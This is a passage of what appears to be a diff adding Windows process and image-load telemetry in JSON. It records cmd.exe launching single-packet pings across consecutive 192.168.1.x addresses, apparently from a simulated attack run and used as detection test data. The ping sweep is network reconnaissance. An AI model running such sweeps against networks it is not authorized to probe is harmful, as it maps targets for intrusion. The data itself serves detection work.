"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "process", + 
"pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572546840000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.116", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3980, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572547029984, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + 
"unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "process", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572551990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.117", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7172, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": 
"{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "process", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572556830000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.118", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "process", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572561990000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.119", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4884, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + 
"pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "process", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572566830000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.120", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7800, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572566980000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7800, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "process", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572571990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.121", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3288, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572300000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "process", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572576990000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.122", 
